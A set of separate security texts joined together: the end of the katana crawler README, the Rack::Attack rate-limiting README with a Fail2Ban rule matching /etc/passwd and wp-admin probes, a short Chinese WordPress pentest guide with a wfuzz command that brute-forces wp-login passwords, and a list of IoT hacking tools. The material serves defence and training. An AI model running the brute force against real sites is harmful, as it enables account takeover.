"body": "<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n",
"technologies": [
"Azure",
"Amazon ECS",
"Amazon Web Services",
"Docker",
"Azure CDN"
],
"raw": "HTTP/1.1 200 OK\r\nContent-Length: 1256\r\nAccept-Ranges: bytes\r\nAge: 331239\r\nCache-Control: max-age=604800\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Mon, 20 Mar 2023 10:53:58 GMT\r\nEtag: \"3147526947\"\r\nExpires: Mon, 27 Mar 2023 10:53:58 GMT\r\nLast-Modified: Thu, 17 Oct 2019 07:18:26 GMT\r\nServer: ECS (dcb/7EA3)\r\nVary: Accept-Encoding\r\nX-Cache: HIT\r\n\r\n<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\n"
}
}
```
*`-store-response`*
----
The `-store-response` option allows for writing all crawled endpoint requests and responses to a text file. When this option is used, text files including the request and response will be written to the **katana_response** directory. If you would like to specify a custom directory, you can use the `-store-response-dir` option.
```console
katana -u https://example.com -no-scope -store-response
```
```bash
$ cat katana_response/index.txt
katana_response/example.com/327c3fda87ce286848a574982ddd0b7c7487f816.txt https://example.com (200 OK)
katana_response/www.iana.org/bfc096e6dd93b993ca8918bf4c08fdc707a70723.txt http://www.iana.org/domains/reserved (200 OK)
```
**Note:**
*`-store-response` option is not supported in `-headless` mode.*
Here are additional CLI options related to output -
```console
katana -h output
OUTPUT:
-o, -output string file to write output to
-sr, -store-response store http requests/responses
-srd, -store-response-dir string store http requests/responses to custom directory
-j, -json write output in JSONL(ines) format
-nc, -no-color disable output content coloring (ANSI escape codes)
-silent display output only
-v, -verbose display verbose output
-version display project version
```
## Katana as a library
`katana` can be used as a library by creating an instance of the `Option` struct and populating it with the same options that would be specified via CLI. Using the options you can create `crawlerOptions` and so standard or hybrid `crawler`.
`crawler.Crawl` method should be called to crawl the input.
```
package main
import (
"github.com/projectdiscovery/gologger"
"github.com/projectdiscovery/katana/pkg/engine/standard"
"github.com/projectdiscovery/katana/pkg/output"
"github.com/projectdiscovery/katana/pkg/types"
)
func main() {
options := &types.Options{
MaxDepth: 1, // Maximum depth to crawl
FieldScope: "rdn", // Crawling Scope Field
BodyReadSize: 2 * 1024 * 1024, // Maximum response size to read
RateLimit: 150, // Maximum requests to send per second
Strategy: "depth-first", // Visit strategy (depth-first, breadth-first)
OnResult: func(result output.Result) { // Callback function to execute for result
gologger.Info().Msg(result.Request.URL)
},
}
crawlerOptions, err := types.NewCrawlerOptions(options)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawlerOptions.Close()
crawler, err := standard.New(crawlerOptions)
if err != nil {
gologger.Fatal().Msg(err.Error())
}
defer crawler.Close()
var input = "https://tesla.com"
err = crawler.Crawl(input)
if err != nil {
gologger.Warning().Msgf("Could not crawl %s: %s", input, err.Error())
}
}
```
--------
<div align="center">
katana is made with ❤️ by the [projectdiscovery](https://projectdiscovery.io) team and distributed under [MIT License](LICENSE.md).
<a href="https://discord.gg/projectdiscovery"><img src="https://raw.githubusercontent.com/projectdiscovery/nuclei-burp-plugin/main/static/join-discord.png" width="300" alt="Join Discord"></a>
</div>
|
:warning: You are viewing the development's branch version of README which might contain documentation for unreleased features.
For the README consistent with the latest released version see https://github.com/rack/rack-attack/blob/6-stable/README.md.
# Rack::Attack
*Rack middleware for blocking & throttling abusive requests*
Protect your Rails and Rack apps from bad clients. Rack::Attack lets you easily decide when to *allow*, *block* and *throttle* based on properties of the request.
See the [Backing & Hacking blog post](https://www.kickstarter.com/backing-and-hacking/rack-attack-protection-from-abusive-clients) introducing Rack::Attack.
[![Gem Version](https://badge.fury.io/rb/rack-attack.svg)](https://badge.fury.io/rb/rack-attack)
[![build](https://github.com/rack/rack-attack/actions/workflows/build.yml/badge.svg)](https://github.com/rack/rack-attack/actions/workflows/build.yml)
[![Code Climate](https://codeclimate.com/github/kickstarter/rack-attack.svg)](https://codeclimate.com/github/kickstarter/rack-attack)
[![Join the chat at https://gitter.im/rack-attack/rack-attack](https://badges.gitter.im/rack-attack/rack-attack.svg)](https://gitter.im/rack-attack/rack-attack)
## Table of contents
- [Getting started](#getting-started)
- [Installing](#installing)
- [Plugging into the application](#plugging-into-the-application)
- [Usage](#usage)
- [Safelisting](#safelisting)
- [`safelist_ip(ip_address_string)`](#safelist_ipip_address_string)
- [`safelist_ip(ip_subnet_string)`](#safelist_ipip_subnet_string)
- [`safelist(name, &block)`](#safelistname-block)
- [Blocking](#blocking)
- [`blocklist_ip(ip_address_string)`](#blocklist_ipip_address_string)
- [`blocklist_ip(ip_subnet_string)`](#blocklist_ipip_subnet_string)
- [`blocklist(name, &block)`](#blocklistname-block)
- [Fail2Ban](#fail2ban)
- [Allow2Ban](#allow2ban)
- [Throttling](#throttling)
- [`throttle(name, options, &block)`](#throttlename-options-block)
- [Tracks](#tracks)
- [Cache store configuration](#cache-store-configuration)
- [Customizing responses](#customizing-responses)
- [RateLimit headers for well-behaved clients](#ratelimit-headers-for-well-behaved-clients)
- [Logging & Instrumentation](#logging--instrumentation)
- [Testing](#testing)
- [How it works](#how-it-works)
- [About Tracks](#about-tracks)
- [Performance](#performance)
- [Motivation](#motivation)
- [Contributing](#contributing)
- [Code of Conduct](#code-of-conduct)
- [Development setup](#development-setup)
- [License](#license)
## Getting started
### Installing
Add this line to your application's Gemfile:
```ruby
# In your Gemfile
gem 'rack-attack'
```
And then execute:
$ bundle
Or install it yourself as:
$ gem install rack-attack
### Plugging into the application
Then tell your ruby web application to use rack-attack as a middleware.
a) For __rails__ applications it is used by default.
You can disable it permanently (like for specific environment) or temporarily (can be useful for specific test cases) by writing:
```ruby
Rack::Attack.enabled = false
```
b) For __rack__ applications:
```ruby
# In config.ru
require "rack/attack"
use Rack::Attack
```
__IMPORTANT__: By default, rack-attack won't perform any blocking or throttling, until you specifically tell it what to protect against by configuring some rules.
## Usage
*Tip:* If you just want to get going asap, then you can take our [example configuration](docs/example_configuration.md)
and tailor it to your needs, or check out the [advanced configuration](docs/advanced_configuration.md) examples.
Define rules by calling `Rack::Attack` public methods, in any file that runs when your application is being initialized. For rails applications this means creating a new file named `config/initializers/rack_attack.rb` and writing your rules there.
### Safelisting
Safelists have the most precedence, so any request matching a safelist would be allowed despite matching any number of blocklists or throttles.
#### `safelist_ip(ip_address_string)`
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails app)
Rack::Attack.safelist_ip("5.6.7.8")
```
#### `safelist_ip(ip_subnet_string)`
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails app)
Rack::Attack.safelist_ip("5.6.7.0/24")
```
#### `safelist(name, &block)`
Name your custom safelist and make your ruby-block argument return a truthy value if you want the request to be allowed, and falsy otherwise.
The request object is a [Rack::Request](http://www.rubydoc.info/gems/rack/Rack/Request).
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails apps)
# Provided that trusted users use an HTTP request header named APIKey
Rack::Attack.safelist("mark any authenticated access safe") do |request|
# Requests are allowed if the return value is truthy
request.env["HTTP_APIKEY"] == "secret-string"
end
# Always allow requests from localhost
# (blocklist & throttles are skipped)
Rack::Attack.safelist('allow from localhost') do |req|
# Requests are allowed if the return value is truthy
'127.0.0.1' == req.ip || '::1' == req.ip
end
```
### Blocking
#### `blocklist_ip(ip_address_string)`
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails apps)
Rack::Attack.blocklist_ip("1.2.3.4")
```
#### `blocklist_ip(ip_subnet_string)`
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails apps)
Rack::Attack.blocklist_ip("1.2.0.0/16")
```
#### `blocklist(name, &block)`
Name your custom blocklist and make your ruby-block argument return a truthy value if you want the request to be blocked, and falsy otherwise.
The request object is a [Rack::Request](http://www.rubydoc.info/gems/rack/Rack/Request).
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails apps)
Rack::Attack.blocklist("block all access to admin") do |request|
# Requests are blocked if the return value is truthy
request.path.start_with?("/admin")
end
Rack::Attack.blocklist('block bad UA logins') do |req|
req.path == '/login' && req.post? && req.user_agent == 'BadUA'
end
```
#### Fail2Ban
`Fail2Ban.filter` can be used within a blocklist to block all requests from misbehaving clients.
This pattern is inspired by [fail2ban](https://www.fail2ban.org/wiki/index.php/Main_Page).
See the [fail2ban documentation](https://www.fail2ban.org/wiki/index.php/MANUAL_0_8#Jail_Options) for more details on
how the parameters work. For multiple filters, be sure to put each filter in a separate blocklist and use a unique discriminator for each fail2ban filter.
Fail2ban state is stored in a [configurable cache](#cache-store-configuration) (which defaults to `Rails.cache` if present).
```ruby
# Block suspicious requests for '/etc/password' or wordpress specific paths.
# After 3 blocked requests in 10 minutes, block all requests from that IP for 5 minutes.
Rack::Attack.blocklist('fail2ban pentesters') do |req|
# `filter` returns truthy value if request fails, or if it's from a previously banned IP
# so the request is blocked
Rack::Attack::Fail2Ban.filter("pentesters-#{req.ip}", maxretry: 3, findtime: 10.minutes, bantime: 5.minutes) do
# The count for the IP is incremented if the return value is truthy
CGI.unescape(req.query_string) =~ %r{/etc/passwd} ||
req.path.include?('/etc/passwd') ||
req.path.include?('wp-admin') ||
req.path.include?('wp-login')
end
end
```
Note that `Fail2Ban` filters are not automatically scoped to the blocklist, so when using multiple filters in an application the scoping must be added to the discriminator e.g. `"pentest:#{req.ip}"`.
#### Allow2Ban
`Allow2Ban.filter` works the same way as the `Fail2Ban.filter` except that it *allows* requests from misbehaving
clients until such time as they reach maxretry at which they are cut off as per normal.
Allow2ban state is stored in a [configurable cache](#cache-store-configuration) (which defaults to `Rails.cache` if present).
```ruby
# Lockout IP addresses that are hammering your login page.
# After 20 requests in 1 minute, block all requests from that IP for 1 hour.
Rack::Attack.blocklist('allow2ban login scrapers') do |req|
# `filter` returns false value if request is to your login page (but still
# increments the count) so request below the limit are not blocked until
# they hit the limit. At that point, filter will return true and block.
Rack::Attack::Allow2Ban.filter(req.ip, maxretry: 20, findtime: 1.minute, bantime: 1.hour) do
# The count for the IP is incremented if the return value is truthy.
req.path == '/login' and req.post?
end
end
```
### Throttling
Throttle state is stored in a [configurable cache](#cache-store-configuration) (which defaults to `Rails.cache` if present).
#### `throttle(name, options, &block)`
Name your custom throttle, provide `limit` and `period` as options, and make your ruby-block argument return the __discriminator__. This discriminator is how you tell rack-attack whether you're limiting per IP address, per user email or any other.
The request object is a [Rack::Request](http://www.rubydoc.info/gems/rack/Rack/Request).
E.g.
```ruby
# config/initializers/rack_attack.rb (for rails apps)
Rack::Attack.throttle("requests by ip", limit: 5, period: 2) do |request|
request.ip
end
# Throttle login attempts for a given email parameter to 6 reqs/minute
# Return the *normalized* email as a discriminator on POST /login requests
Rack::Attack.throttle('limit logins per email', limit: 6, period: 60) do |req|
if req.path == '/login' && req.post?
# Normalize the email, using the same logic as your authentication process, to
# protect against rate limit bypasses.
req.params['email'].to_s.downcase.gsub(/\s+/, "")
end
end
# You can also set a limit and period using a proc. For instance, after
# Rack::Auth::Basic has authenticated the user:
limit_proc = proc { |req| req.env["REMOTE_USER"] == "admin" ? 100 : 1 }
period_proc = proc { |req| req.env["REMOTE_USER"] == "admin" ? 1 : 60 }
Rack::Attack.throttle('request per ip', limit: limit_proc, period: period_proc) do |request|
request.ip
end
```
### Tracks
```ruby
# Track requests from a special user agent.
Rack::Attack.track("special_agent") do |req|
req.user_agent == "SpecialAgent"
end
# Supports optional limit and period, triggers the notification only when the limit is reached.
Rack::Attack.track("special_agent", limit: 6, period: 60) do |req|
req.user_agent == "SpecialAgent"
end
# Track it using ActiveSupport::Notification
ActiveSupport::Notifications.subscribe("track.rack_attack") do |name, start, finish, request_id, payload|
req = payload[:request]
if req.env['rack.attack.matched'] == "special_agent"
Rails.logger.info "special_agent: #{req.path}"
STATSD.increment("special_agent")
end
end
```
### Cache store configuration
Throttle, allow2ban and fail2ban state is stored in a configurable cache (which defaults to `Rails.cache` if present), presumably backed by memcached or redis ([at least gem v3.0.0](https://rubygems.org/gems/redis)).
```ruby
# This is the default
Rack::Attack.cache.store = Rails.cache
# It is recommended to use a separate database for throttling/allow2ban/fail2ban.
Rack::Attack.cache.store = ActiveSupport::Cache::RedisCacheStore.new(url: "...")
```
Most applications should use a new, separate database used only for `rack-attack`. During an actual attack or periods of heavy load, this database will come under heavy load. Keeping it on a separate database instance will give you additional resilience and make sure that other functions (like caching for your application) don't go down.
Note that `Rack::Attack.cache` is only used for throttling, allow2ban and fail2ban filtering; not blocklisting and safelisting. Your cache store must implement `increment` and `write` like [ActiveSupport::Cache::Store](http://api.rubyonrails.org/classes/ActiveSupport/Cache/Store.html). This means that other cache stores which inherit from ActiveSupport::Cache::Store are also compatible. In-memory stores which are not backed by an external database, such as `ActiveSupport::Cache::MemoryStore.new`, will be mostly ineffective because each Ruby process in your deployment will have it's own state, effectively multiplying the number of requests each client can make by the number of Ruby processes you have deployed.
## Customizing responses
Customize the response of blocklisted and throttled requests using an object that adheres to the [Rack app interface](http://www.rubydoc.info/github/rack/rack/file/SPEC.rdoc).
```ruby
Rack::Attack.blocklisted_responder = lambda do |request|
# Using 503 because it may make attacker think that they have successfully
# DOSed the site. Rack::Attack returns 403 for blocklists by default
[ 503, {}, ['Blocked']]
end
Rack::Attack.throttled_responder = lambda do |request|
# NB: you have access to the name and other data about the matched throttle
# request.env['rack.attack.matched'],
# request.env['rack.attack.match_type'],
# request.env['rack.attack.match_data'],
# request.env['rack.attack.match_discriminator']
# Using 503 because it may make attacker think that they have successfully
# DOSed the site. Rack::Attack returns 429 for throttling by default
[ 503, {}, ["Server Error\n"]]
end
```
### RateLimit headers for well-behaved clients
While Rack::Attack's primary focus is minimizing harm from abusive clients, it
can also be used to return rate limit data that's helpful for well-behaved clients.
If you want to return to user how many seconds to wait until they can start sending requests again, this can be done through enabling `Retry-After` header:
```ruby
Rack::Attack.throttled_response_retry_after_header = true
```
Here's an example response that includes conventional `RateLimit-*` headers:
```ruby
Rack::Attack.throttled_responder = lambda do |request|
match_data = request.env['rack.attack.match_data']
now = match_data[:epoch_time]
headers = {
'RateLimit-Limit' => match_data[:limit].to_s,
'RateLimit-Remaining' => '0',
'RateLimit-Reset' => (now + (match_data[:period] - now % match_data[:period])).to_s
}
[ 429, headers, ["Throttled\n"]]
end
```
For responses that did not exceed a throttle limit, Rack::Attack annotates the env with match data:
```ruby
request.env['rack.attack.throttle_data'][name] # => { discriminator: d, count: n, period: p, limit: l, epoch_time: t }
```
## Logging & Instrumentation
Rack::Attack uses the [ActiveSupport::Notifications](http://api.rubyonrails.org/classes/ActiveSupport/Notifications.html) API if available.
You can subscribe to `rack_attack` events and log it, graph it, etc.
To get notified about specific type of events, subscribe to the event name followed by the `rack_attack` namespace.
E.g. for throttles use:
```ruby
ActiveSupport::Notifications.subscribe("throttle.rack_attack") do |name, start, finish, request_id, payload|
# request object available in payload[:request]
# Your code here
end
```
If you want to subscribe to every `rack_attack` event, use:
```ruby
ActiveSupport::Notifications.subscribe(/rack_attack/) do |name, start, finish, request_id, payload|
# request object available in payload[:request]
# Your code here
end
```
## Testing
A note on developing and testing apps using Rack::Attack - if you are using throttling in particular, you will
need to enable the cache in your development environment. See [Caching with Rails](http://guides.rubyonrails.org/caching_with_rails.html)
for more on how to do this.
### Disabling
`Rack::Attack.enabled = false` can be used to either completely disable Rack::Attack in your tests, or to disable/enable for specific test cases only.
### Test case isolation
`Rack::Attack.reset!` can be used in your test suite to clear any Rack::Attack state between different test cases. If you're testing blocklist and safelist configurations, consider using `Rack::Attack.clear_configuration` to unset the values for those lists between test cases.
## How it works
The Rack::Attack middleware compares each request against *safelists*, *blocklists*, *throttles*, and *tracks* that you define. There are none by default.
* If the request matches any **safelist**, it is allowed.
* Otherwise, if the request matches any **blocklist**, it is blocked.
* Otherwise, if the request matches any **throttle**, a counter is incremented in the Rack::Attack.cache. If any throttle's limit is exceeded, the request is blocked.
* Otherwise, all **tracks** are checked, and the request is allowed.
The algorithm is actually more concise in code: See [Rack::Attack.call](lib/rack/attack.rb):
```ruby
def call(env)
req = Rack::Attack::Request.new(env)
if safelisted?(req)
@app.call(env)
elsif blocklisted?(req)
self.class.blocklisted_responder.call(req)
elsif throttled?(req)
self.class.throttled_responder.call(req)
else
tracked?(req)
@app.call(env)
end
end
```
Note: `Rack::Attack::Request` is just a subclass of `Rack::Request` so that you
can cleanly monkey patch helper methods onto the
[request object](lib/rack/attack/request.rb).
### About Tracks
`Rack::Attack.track` doesn't affect request processing. Tracks are an easy way to log and measure requests matching arbitrary attributes.
## Performance
The overhead of running Rack::Attack is typically negligible (a few milliseconds per request),
but it depends on how many checks you've configured, and how long they take.
Throttles usually require a network roundtrip to your cache server(s),
so try to keep the number of throttle checks per request low.
If a request is blocklisted or throttled, the response is a very simple Rack response.
A single typical ruby web server thread can block several hundred requests per second.
Rack::Attack complements tools like `iptables` and nginx's [limit_conn_zone module](https://nginx.org/en/docs/http/ngx_http_limit_conn_module.html#limit_conn_zone).
## Motivation
Abusive clients range from malicious login crackers to naively-written scrapers.
They hinder the security, performance, & availability of web applications.
It is impractical if not impossible to block abusive clients completely.
Rack::Attack aims to let developers quickly mitigate abusive requests and rely
less on short-term, one-off hacks to block a particular attack.
## Contributing
Check out the [Contributing guide](CONTRIBUTING.md).
## Code of Conduct
This project is intended to be a safe, welcoming space for collaboration, and contributors are expected to adhere to the [Code of Conduct](CODE_OF_CONDUCT.md).
## Development setup
Check out the [Development guide](docs/development.md).
## License
Copyright Kickstarter, PBC.
Released under an [MIT License](https://opensource.org/licenses/MIT).
|
# WordPress 测试方法论
## 0x1 扫描
使用工具:wpscan(Kali 自带)
*针对所有 Wordpress 网站的测试,首先都应该使用 wpscan 进行扫描:*
```
wpscan --url http://192.168.1.28/
```
扫描结果中中重点关注 WordPress 的版本?使用了什么 Plugin ?Plugin 版本是什么?
然后使用 searchsloit 来查询漏洞。
## 0x2 暴力破解
使用工具:Wfuzz(Kali 自带)
很多 WordPress 的漏洞都需要登录到后台才能利用,这里使用 Wfzuu 工具进行爆破:
```
# 按照实际情况调整-hh 参数
wfuzz -w /usr/share/wordlists/fast* -d "log=admin&pwd=FUZZ&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.1.1.1%2Fwp-admin%2F&testcookie=1" -c --hh=3358 http://10.1.1.1/wp-login.php
```
参数解释:
- `-w` 指定字典
- `-d` POST 的数据
- `-c` 带颜色输出
- `--hh` 过滤掉响应包长度为3358字节的结果
|
# Internet of Things (IoT) Hacking Resources
The Internet of Things (IoT) Hacking Resources refer to an array of tools and frameworks used to ensure the security of IoT devices and networks.
## Analysis Frameworks
- [EXPLIoT](https://gitlab.com/expliot_framework/expliot): This is a penetrating testing framework that is akin to Metasploit, but it specifically caters to Internet of Things (IoT) applications.
- [FACT - The Firmware Analysis and Comparison Tool](https://fkie-cad.github.io/FACT_core/): A comprehensive static analysis tool that specializes in firmware extraction, plugin-facilitated analysis, and comparison between different firmware versions. To understand more, watch this [conference talk](https://passthesalt.ubicast.tv/videos/improving-your-firmware-security-analysis-process-with-fact/) discussing enhancements in the firmware security analysis process using FACT.
- [FwAnalyzer](https://github.com/cruise-automation/fwanalyzer): Designed to evaluate firmware security via customized rule-based analysis. It's an excellent complementary step in DevSecOps, analogous to Continuous Integration (CI) in function.
- [HAL – The Hardware Analyzer](https://github.com/emsec/hal): An all-encompassing reverse engineering tool that provides a manipulation framework for gate-level netlists.
- [HomePWN](https://github.com/ElevenPaths/HomePWN): Consider it your Swiss Army Knife for penetration testing of IoT devices.
- [IoTSecFuzz](https://gitlab.com/invuls/iot-projects/iotsecfuzz): This framework automates the security analysis of IoT layers, including hardware, software, and communication.
- [Killerbee](https://github.com/riverloopsec/killerbee): An established framework for the testing and auditing of ZigBee and IEEE 802.15.4 networks.
- [PRET](https://github.com/RUB-NDS/PRET): The go-to toolkit for printer exploitation.
- [Routersploit](https://github.com/threat9/routersploit): A dedicated framework specifically designed to exploit embedded devices.
## Advanced Tools for Binary and Firmware Analysis
- [Binwalk](https://github.com/ReFirmLabs/binwalk): This powerful tool delves into binaries to identify "interesting" elements and also facilitates the extraction of arbitrary files.
- [emba](https://github.com/e-m-b-a/emba): Designed specifically to analyze the Linux-based firmware of embedded devices, emba provides a comprehensive framework for firmware scrutiny.
- [Firmadyne](https://github.com/firmadyne/firmadyne): This resource aims to emulate and conduct penetration tests on various firmwares, providing a simulation environment for security testing.
- [Firmwalker](https://github.com/craigz28/firmwalker): This tool specializes in exploring extracted firmware images, searching for relevant files and information.
- [Firmware Slap](https://github.com/ChrisTheCoolHut/Firmware_Slap): A unique tool for discovering vulnerabilities in firmware through the method of concolic analysis and function clustering.
- [Ghidra](https://ghidra-sre.org/): Ghidra is a comprehensive Software Reverse Engineering suite. It can manage arbitrary binaries when provided with the CPU architecture and endianness of the binary.
- [Radare2](https://github.com/radare/radare2): This is a versatile Software Reverse Engineering framework. Capable of handling popular formats and arbitrary binaries, it boasts an extensive command line toolkit.
- [Trommel](https://github.com/CERTCC/trommel): Trommel conducts a detailed search through extracted firmware images, hunting for relevant files and intriguing information.
## Tools for Firmware Extraction and Manipulation
- [FACT Extractor](https://github.com/fkie-cad/fact_extractor): This intelligent tool identifies container formats automatically and triggers the appropriate extraction tool, thereby streamlining the process.
- [Firmware Mod Kit](https://github.com/rampageX/firmware-mod-kit/wiki): This kit provides a range of extraction tools compatible with various container formats, offering a versatile solution for firmware modification.
- [The SRecord package](http://srecord.sourceforge.net/): This package encompasses a suite of tools for manipulating EPROM files. Its functionality includes the ability to convert numerous binary formats, providing an essential resource for binary file conversion and manipulation.
- [JTAGenum](https://github.com/cyphunk/JTAGenum) - Add JTAG capabilities to an Arduino.
- [OpenOCD](http://openocd.org/) - Free and Open On-Chip Debugging, In-System Programming and Boundary-Scan Testing.
## Misc Tools
- [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.
- [dumpflash](https://github.com/ohjeongwook/dumpflash) - Low-level NAND Flash dump and parsing utility.
- [flashrom](https://github.com/flashrom/flashrom) - Tool for detecting, reading, writing, verifying and erasing flash chips.
- [Samsung Firmware Magic](https://github.com/chrivers/samsung-firmware-magic) - Decrypt Samsung SSD firmware updates.
## Hardware Tools
- [Bus Blaster](http://dangerousprototypes.com/docs/Bus_Blaster) - Detects and interacts with hardware debug ports like [UART](https://en.wikipedia.org/wiki/Universal_asynchronous_receiver-transmitter) and [JTAG](https://en.wikipedia.org/wiki/JTAG).
- [Bus Pirate](http://dangerousprototypes.com/docs/Bus_Pirate) - Detects and interacts with hardware debug ports like UART and JTAG.
- [Shikra](https://int3.cc/products/the-shikra) - Detects and interacts with hardware debug ports like UART and JTAG. Among other protocols.
- [JTAGULATOR](http://www.grandideastudio.com/jtagulator/) - Detects JTAG Pinouts fast.
- [Saleae](https://www.saleae.com/) - Easy to use Logic Analyzer that support many protocols :euro:.
- [Ikalogic](https://www.ikalogic.com/pages/logic-analyzer-sp-series-sp209) - Alternative to Saleae logic analyzers :euro:.
- [HydraBus](https://hydrabus.com/hydrabus-1-0-specifications/) - Open source multi-tool hardware similar to the BusPirate but with NFC capabilities.
- [ChipWhisperer](https://newae.com/chipwhisperer/) - Detects Glitch/Side-channel attacks.
- [Glasgow](https://github.com/GlasgowEmbedded/Glasgow) - Tool for exploring and debugging different digital interfaces.
- [J-Link](https://www.segger.com/products/debug-probes/j-link/models/model-overview/) - J-Link offers USB powered JTAG debug probes for multiple different CPU cores :euro:.
## Bluetooth BLE Tools
- [UberTooth One](https://greatscottgadgets.com/ubertoothone/) - Open source 2.4 GHz wireless development platform suitable for Bluetooth experimentation.
- [Bluefruit LE Sniffer](https://www.adafruit.com/product/2269) - Easy to use Bluetooth Low Energy sniffer.
## ZigBee Tools
- [ApiMote](http://apimote.com) - ZigBee security research hardware for learning about and evaluating the security of IEEE 802.15.4/ZigBee systems. Killerbee compatible.
- Atmel RZUSBstick - Discontinued product. Lucky if you have one! - Tool for development, debugging and demonstration of a wide range of low power wireless applications including IEEE 802.15.4, 6LoWPAN, and ZigBee networks. Killerbee compatible.
- [Freakduino](https://freaklabsstore.com/index.php?main_page=product_info&cPath=22&products_id=219&zenid=fpmu2kuuk4abjf6aurt3bjnfk4) - Low Cost Battery Operated Wireless Arduino Board that can be turned into a IEEE 802.15.4 protocol sniffer.
### SDR Tools
- [RTL-SDR](https://www.rtl-sdr.com/buy-rtl-sdr-dvb-t-dongles/) - Cheapest SDR for beginners. It is a computer based radio scanner for receiving live radio signals frequencies from 500 kHz up to 1.75 GHz.
- [HackRF One](https://greatscottgadgets.com/hackrf/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 1 MHz to 6 GHz (half-duplex).
- [YardStick One](https://greatscottgadgets.com/yardstickone/) - Half-duplex sub-1 GHz wireless transceiver.
- [LimeSDR](https://www.crowdsupply.com/lime-micro/limesdr) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 100 KHz to 3.8 GHz (full-duplex).
- [BladeRF 2.0](https://www.nuand.com/bladerf-2-0-micro/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 47 MHz to 6 GHz (full-duplex).
- [USRP B Series](https://www.ettus.com/product-categories/usrp-bus-series/) - Software Defined Radio peripheral capable of transmission or reception of radio signals from 70 MHz to 6 GHz (full-duplex).
### RFID NFC Tools
- [Proxmark 3 RDV4](https://www.proxmark.com/) - Powerful general purpose RFID tool. From Low Frequency (125kHz) to High Frequency (13.56MHz) tags.
- [ChamaleonMini](http://chameleontiny.com/) - Programmable, portable tool for NFC security analysis.
- [HydraNFC](https://hydrabus.com/hydranfc-1-0-specifications/) - Powerful 13.56MHz RFID / NFC platform. Read / write / crack / sniff / emulate.
## Free Training
- [CSAW Embedded Security Challenge 2019](https://github.com/TrustworthyComputing/csaw_esc_2019) - CSAW 2019 Embedded Security Challenge (ESC).
- [Embedded Security CTF](https://microcorruption.com) - Microcorruption: Embedded Security CTF.
- [Hardware Hacking 101](https://github.com/rdomanski/hardware_hacking/tree/master/my_talks/Hardware_Hacking_101) - Workshop @ BSides Munich 2019.
- [IoTGoat](https://github.com/scriptingxss/IoTGoat) - IoTGoat is a deliberately insecure firmware based on OpenWrt.
- [Rhme-2015](https://github.com/Riscure/RHme-2015) - First riscure Hack me hardware CTF challenge.
- [Rhme-2016](https://github.com/Riscure/Rhme-2016) - Riscure Hack me 2 is a low level hardware CTF challenge.
- [Rhme-2017/2018](https://github.com/Riscure/Rhme-2017) - Riscure Hack Me 3 embedded hardware CTF 2017-2018.
## Websites
- [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page) - All things printer.
- [OWASP Embedded Application Security Project](https://owasp.org/www-project-embedded-application-security/) - Development best practices and list of hardware and software tools.
- [OWASP Internet of Things Project](https://owasp.org/www-project-internet-of-things/) - IoT common vulnerabilities and attack surfaces.
- [Router Passwords](https://192-168-1-1ip.mobi/default-router-passwords-list/) - Default login credential database sorted by manufacturer.
- [Siliconpr0n](https://siliconpr0n.org/) - A Wiki/Archive of all things IC reversing.
### Blogs
- [RTL-SDR](https://www.rtl-sdr.com/)
- [/dev/ttyS0's Embedded Device Hacking](http://www.devttys0.com/blog/)
- [Exploiteers](https://www.exploitee.rs/)
- [Hackaday](https://hackaday.com)
- [jcjc's Hack The World](https://jcjc-dev.com/)
- [Quarkslab](https://blog.quarkslab.com/)
- [wrong baud](https://wrongbaud.github.io/)
- [Firmware Security](https://firmwaresecurity.com/)
- [PenTestPartners](https://www.pentestpartners.com/internet-of-things/)
- [Attify](https://blog.attify.com/)
- [Patayu](https://payatu.com/blog)
- [GracefulSecurity - Hardware tag](https://gracefulsecurity.com/category/hardware/)
